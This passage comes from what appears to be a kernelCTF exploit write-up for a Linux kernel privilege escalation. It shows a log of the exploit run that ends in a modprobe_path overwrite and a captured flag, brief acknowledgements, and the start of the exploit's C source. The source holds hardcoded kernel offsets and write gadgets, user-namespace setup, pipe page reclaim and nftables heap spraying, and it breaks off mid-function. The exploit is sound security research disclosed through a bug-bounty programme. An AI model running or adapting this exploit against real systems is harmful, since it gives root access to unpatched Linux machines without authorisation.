[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
[   10.699977]  &lt;/TASK&gt;
[   10.701360] ---[ end trace 8e001f66f1703586 ]---
[&gt;] Executing cross-cache stage-4...
[&gt;] Executing cross-cache stage-5 and reclaiming page...
[&gt;] Overwriting modprobe path...
[   11.859455] xt_cgroup: invalid path, errno=-2
[   11.864787] xt_cgroup: invalid path, errno=-2
[   11.869782] xt_cgroup: invalid path, errno=-2
[   11.874720] xt_cgroup: invalid path, errno=-2
[   11.879548] xt_cgroup: invalid path, errno=-2
[   11.884427] xt_cgroup: invalid path, errno=-2
[   11.889362] xt_cgroup: invalid path, errno=-2
[   11.894300] xt_cgroup: invalid path, errno=-2
[   11.899125] xt_cgroup: invalid path, errno=-2
[   11.904009] xt_cgroup: invalid path, errno=-2
[   16.861299] cgroup_mt_check_v2: 2317 callbacks suppressed
[   16.861303] xt_cgroup: invalid path, errno=-2
[   16.869908] xt_cgroup: invalid path, errno=-2
[   16.875051] xt_cgroup: invalid path, errno=-2
[   16.880257] xt_cgroup: invalid path, errno=-2
[   16.885424] xt_cgroup: invalid path, errno=-2
[   16.890615] xt_cgroup: invalid path, errno=-2
[   16.896175] xt_cgroup: invalid path, errno=-2
[   16.901367] xt_cgroup: invalid path, errno=-2
[   16.906582] xt_cgroup: invalid path, errno=-2
[   16.911806] xt_cgroup: invalid path, errno=-2
[&gt;] Modprobe path is *probably* overwritten lol!
kernelCTF{v1:cos-105-17412.535.34:SNIPPED}
./trigger.sh: 1: ����: not found
user@cos-105-17412:/tmp$ ^C
</code></pre></div></div>

<h2 id="thanks--misc">Thanks &amp;&amp; Misc</h2>
<p>Huge thanks to all the kCTF moderators like <a href="https://x.com/pwningsystems">Jordy</a> and <a href="https://x.com/koczkatamas">KT</a> who answer all my questions and are very charitable. Also big thanks to my friends <a href="https://x.com/chompie1337">Chompie</a> and <a href="https://x.com/Firzen14">Firzen</a> for being my sounding board and supportive. Also thanks to <a href="https://x.com/u1f383">Pumpkin</a> for always helping me and answering DMs.</p>

<p>The exploit has some artifacts in it still that are there because I did initial development work on a 6.* kernel version and then switched to a kCTF bzImage which is kernel version 5.*, there is also all of the nftables code in the exploit still for spraying tables with userdata, I just kept that code in there to do the kmalloc-128 page reservation required to get my victim page sent back to the allocator. In a way, I did finally get to use <code class="language-plaintext highlighter-rouge">table-&gt;udata</code>.</p>

<h2 id="exploit">Exploit</h2>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define _GNU_SOURCE
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sched.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/socket.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/socket.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/netlink.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/xfrm.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/utsname.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/resource.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/wait.h&gt;</span><span class="cp">
</span>
<span class="cp">#include</span> <span class="cpf">&lt;libmnl/libmnl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/netfilter.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/netfilter/nf_tables.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;libnftnl/table.h&gt;</span><span class="c1"> </span><span class="cp">
</span>
<span class="c1">// Kernel base address</span>
<span class="kt">uint64_t</span> <span class="n">g_kernel_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Address of kernfs_pr_cont_buf</span>
<span class="kt">uint64_t</span> <span class="n">g_kernfs_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Address of the offset from kernel base for kernfs_pr_cont_buf</span>
<span class="kt">uint64_t</span> <span class="n">kernfs_addr_off_6</span> <span class="o">=</span> <span class="mh">0x3691a80</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">kernfs_addr_off_5</span> <span class="o">=</span> <span class="mh">0x3267b80</span><span class="p">;</span>

<span class="c1">// Offset for entry_SYSCALL_64_offset</span>
<span class="kt">uint64_t</span> <span class="n">g_entry_syscall_off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version</span>
<span class="kt">uint64_t</span> <span class="n">entry_syscall_off_6</span> <span class="o">=</span> <span class="mh">0x1400040</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">entry_syscall_off_5</span> <span class="o">=</span> <span class="mh">0x1200080</span><span class="p">;</span>

<span class="c1">// Our arbitrary write gadget clear_nlink</span>
<span class="kt">uint64_t</span> <span class="n">g_write_gadget_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version</span>
<span class="kt">uint64_t</span> <span class="n">write_gadget_off_5</span> <span class="o">=</span> <span class="mh">0x356310</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">write_gadget_off_6</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Modprobe path addr</span>
<span class="kt">uint64_t</span> <span class="n">g_modprobe_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version </span>
<span class="kt">uint64_t</span> <span class="n">modprobe_off_5</span> <span class="o">=</span> <span class="mh">0x2662e80</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">modprobe_off_6</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// A mutable write target that we use to overwrite modprobe one byte at a time</span>
<span class="kt">uint64_t</span> <span class="n">g_write_target</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Our Return NULL gadget</span>
<span class="kt">uint64_t</span> <span class="n">g_null_gadget_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version</span>
<span class="kt">uint64_t</span> <span class="n">null_gadget_off_5</span> <span class="o">=</span> <span class="mh">0xd4ab80</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">null_gadget_off_6</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// We target [rax + 0x450] with our gadget, so we subtract this from the ptr</span>
<span class="c1">// value in our fake buffer</span>
<span class="cp">#define WRITE_TARGET_OFFSET 0x450UL
</span>
<span class="c1">// Pin our process (and children from system() / fork()) to core-0</span>
<span class="kt">void</span> <span class="nf">pin_to_core_0</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">cpu_set_t</span> <span class="n">mask</span><span class="p">;</span>
    <span class="n">CPU_ZERO</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>
    <span class="n">CPU_SET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">sched_setaffinity</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">mask</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"sched_setaffinity"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Write to a file so we can set our user ids</span>
<span class="kt">int</span> <span class="nf">write_mapping</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">content</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">O_WRONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to open %s: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="k">if</span> <span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">content</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">content</span><span class="p">))</span> <span class="o">!=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">content</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to write to %s: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Unshare our namespaces so that we can get the caps we want</span>
<span class="kt">void</span> <span class="nf">unshare_stuff</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Unshare into new user namespace</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unshare</span><span class="p">(</span><span class="n">CLONE_NEWUSER</span> <span class="o">|</span> <span class="n">CLONE_NEWNET</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"unshare failed: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// First disable setgroups</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">write_mapping</span><span class="p">(</span><span class="s">"/proc/self/setgroups"</span><span class="p">,</span> <span class="s">"deny"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to disable setgroups</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Then map our UID and GID</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">write_mapping</span><span class="p">(</span><span class="s">"/proc/self/uid_map"</span><span class="p">,</span> <span class="s">"0 1000 1"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">||</span>
        <span class="n">write_mapping</span><span class="p">(</span><span class="s">"/proc/self/gid_map"</span><span class="p">,</span> <span class="s">"0 1000 1"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to write ID mappings</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Bring up the loopback interface</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Bringing up lo interface...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">system</span><span class="p">(</span><span class="s">"./ip.bin link set lo up"</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to bring up loopback interface.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Start listener</span>
<span class="kt">void</span> <span class="nf">start_udp_listener</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"nohup ./socat.bin -u UDP-RECV:8888 STDOUT &gt;/dev/null 2&gt;&amp;1 &amp;"</span><span class="p">);</span>
<span class="p">}</span>

<span class="cp">#define PIPE_MAX 32
#define PIPE_READ 0
#define PIPE_WRITE 1
</span>
<span class="c1">// An array to hold pipe fds</span>
<span class="kt">int</span> <span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">PIPE_MAX</span><span class="p">][</span><span class="mi">2</span><span class="p">];</span>

<span class="c1">// Allocate pipes </span>
<span class="kt">void</span> <span class="nf">allocate_pipes</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">PIPE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">pipe</span><span class="p">(</span><span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">perror</span><span class="p">(</span><span class="s">"pipe"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Attempt to reclaim our page by allocating pages to back the pipes</span>
<span class="kt">void</span> <span class="nf">reclaim_page</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">write_buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">write_buf</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sc">'B'</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">PIPE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">write_buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="cp">#define NUM_SPRAY_OBJS 4096UL
#define USERDATA_SIZE 128UL
#define MNL_BUF_SIZE 4096UL
</span>
<span class="c1">// Global for user data, set once</span>
<span class="kt">char</span> <span class="n">g_userdata</span><span class="p">[</span><span class="n">USERDATA_SIZE</span><span class="p">];</span>

<span class="c1">// Creates a single nftables table to spray userdata</span>
<span class="kt">void</span> <span class="nf">create_table</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error: Table name is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">struct</span> <span class="n">mnl_socket</span> <span class="o">*</span><span class="n">mnl_sock</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">mnl_nlmsg_batch</span> <span class="o">*</span><span class="n">batch</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="n">MNL_BUF_SIZE</span><span class="p">];</span>

    <span class="c1">// Open Netlink socket</span>
    <span class="n">mnl_sock</span> <span class="o">=</span> <span class="n">mnl_socket_open</span><span class="p">(</span><span class="n">NETLINK_NETFILTER</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">mnl_sock</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_open"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Connect to Netlink</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_bind</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MNL_SOCKET_AUTOPID</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_bind"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Initialize Netlink batch (one message per batch)</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="n">batch</span> <span class="o">=</span> <span class="n">mnl_nlmsg_batch_start</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>

    <span class="kt">int</span> <span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">nftnl_batch_begin</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="k">struct</span> <span class="n">nftnl_table</span> <span class="o">*</span><span class="n">table</span> <span class="o">=</span> <span class="n">nftnl_table_alloc</span><span class="p">();</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"nftnl_table_alloc"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="c1">// Set table attributes</span>
    <span class="n">nftnl_table_set_u32</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_FAMILY</span><span class="p">,</span> <span class="n">NFPROTO_INET</span><span class="p">);</span>
    <span class="n">nftnl_table_set_str</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_NAME</span><span class="p">,</span> <span class="n">table_name</span><span class="p">);</span>

    <span class="c1">// Set 128-byte userdata</span>
    <span class="n">nftnl_table_set_data</span><span class="p">(</span><span class="n">table</span><span class="p">,</span> <span class="n">NFTNL_TABLE_USERDATA</span><span class="p">,</span> <span class="n">g_userdata</span><span class="p">,</span> <span class="n">USERDATA_SIZE</span><span class="p">);</span>

    <span class="c1">// Build Netlink message</span>
    <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">msg_hdr</span> <span class="o">=</span> <span class="n">nftnl_table_nlmsg_build_hdr</span><span class="p">(</span>
        <span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
        <span class="n">NFT_MSG_NEWTABLE</span><span class="p">,</span>
        <span class="n">NFPROTO_INET</span><span class="p">,</span>
        <span class="n">NLM_F_CREATE</span> <span class="o">|</span> <span class="n">NLM_F_EXCL</span> <span class="o">|</span> <span class="n">NLM_F_ACK</span><span class="p">,</span>
        <span class="n">seq</span><span class="o">++</span>
    <span class="p">);</span>

    <span class="c1">// Attach table payload</span>
    <span class="n">nftnl_table_nlmsg_build_payload</span><span class="p">(</span><span class="n">msg_hdr</span><span class="p">,</span> <span class="n">table</span><span class="p">);</span>
    <span class="n">nftnl_table_free</span><span class="p">(</span><span class="n">table</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// End batch (one message only)</span>
    <span class="n">nftnl_batch_end</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

    <span class="c1">// Send the batch (one message per batch)</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_sendto</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">mnl_nlmsg_batch_head</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span>
                          <span class="n">mnl_nlmsg_batch_size</span><span class="p">(</span><span class="n">batch</span><span class="p">))</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_sendto"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="kt">ssize_t</span> <span class="n">recv_len</span> <span class="o">=</span> <span class="n">mnl_socket_recvfrom</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">recv_len</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_recvfrom"</span><span class="p">);</span>
    <span class="p">}</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="n">nlh</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsghdr</span> <span class="o">*</span><span class="p">)</span><span class="n">buf</span><span class="p">;</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">nlh</span><span class="o">-&gt;</span><span class="n">nlmsg_type</span> <span class="o">==</span> <span class="n">NLMSG_ERROR</span><span class="p">)</span> <span class="p">{</span>
            <span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="n">err</span> <span class="o">=</span> <span class="p">(</span><span class="k">struct</span> <span class="n">nlmsgerr</span> <span class="o">*</span><span class="p">)</span><span class="n">mnl_nlmsg_get_payload</span><span class="p">(</span><span class="n">nlh</span><span class="p">);</span>
            <span class="k">if</span> <span class="p">(</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Netlink error: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="o">-</span><span class="n">err</span><span class="o">-&gt;</span><span class="n">error</span><span class="p">));</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Cleanup</span>
    <span class="n">mnl_nlmsg_batch_stop</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>
    <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
<span class="p">}</span>

<span class="c1">// Deletes a single nftables table</span>
<span class="kt">void</span> <span class="nf">delete_table</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error: Table name is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">struct</span> <span class="n">mnl_socket</span> <span class="o">*</span><span class="n">mnl_sock</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">mnl_nlmsg_batch</span> <span class="o">*</span><span class="n">batch</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="n">MNL_BUF_SIZE</span><span class="p">];</span>

    <span class="c1">// Open Netlink socket</span>
    <span class="n">mnl_sock</span> <span class="o">=</span> <span class="n">mnl_socket_open</span><span class="p">(</span><span class="n">NETLINK_NETFILTER</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">mnl_sock</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_open"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Connect to Netlink</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_bind</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MNL_SOCKET_AUTOPID</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_bind"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Initialize Netlink batch</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="n">batch</span> <span class="o">=</span> <span class="n">mnl_nlmsg_batch_start</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>

    <span class="kt">int</span> <span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="n">nftnl_batch_begin</span><span class="p">(</span><span class="n">mnl_nlmsg_batch_current</span><span class="p">(</span><span class="n">batch</span><span class="p">),</span> <span class="n">seq</span><span class="o">++</span><span class="p">);</span>
    <span class="n">mnl_nlmsg_batch_next</span><span class="p">(</span><span class="n">batch</span><span class="p">);</span>

